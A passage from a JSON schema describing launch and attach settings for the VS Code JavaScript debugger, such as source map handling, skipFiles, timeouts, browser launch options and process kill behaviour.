attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"targetSelection":{"default":"automatic","enum":["pick","automatic"],"markdownDescription":"Whether to attach to all targets that match the URL filter (\"automatic\") or ask to pick one (\"pick\").","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}}},"launch":{"properties":{"browserLaunchLocation":{"default":null,"description":"Forces the browser to be launched in one location. In a remote workspace (through ssh or WSL, for example) this can be used to open the browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"cleanUp":{"default":"wholeBrowser","description":"What clean-up to do after the debugging session finishes. Close only the tab being debug, vs. close the whole browser.","enum":["wholeBrowser","onlyTab"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":null,"description":"Optional working directory for the runtime executable.","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"default":{},"description":"Optional dictionary of environment key/value pairs for the browser.","type":"object"},"file":{"default":"${workspaceFolder}/index.html","description":"A local html file to open in the browser","tags":["setup"],"type":"string"},"includeDefaultArgs":{"default":true,"description":"Whether default browser launch arguments (to disable features that may make debugging harder) will be included in the launch.","type":"boolean"},"includeLaunchArgs":{"default":true,"description":"Advanced: whether any default launch/debugging arguments are set on the browser. The debugger will assume the browser will use pipe debugging such as that which is provided with `--remote-debugging-pipe`.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how browser processes are killed when stopping the session with `cleanUp: wholeBrowser`. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":0,"description":"Port for the browser to listen on. Defaults to \"0\", which will cause the browser to be debugged via pipes, which is generally more secure and should be chosen unless you need to attach to the browser from another tool.","type":"number"},"profileStartup":{"default":true,"description":"If true, will start profiling soon as the process launches","type":"boolean"},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"type":"array"},"runtimeExecutable":{"default":"stable","description":"Either 'canary', 'stable', 'custom' or path to the browser executable. Custom means a custom wrapper, custom build or CHROME_PATH environment variable.","type":["string","null"]},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless 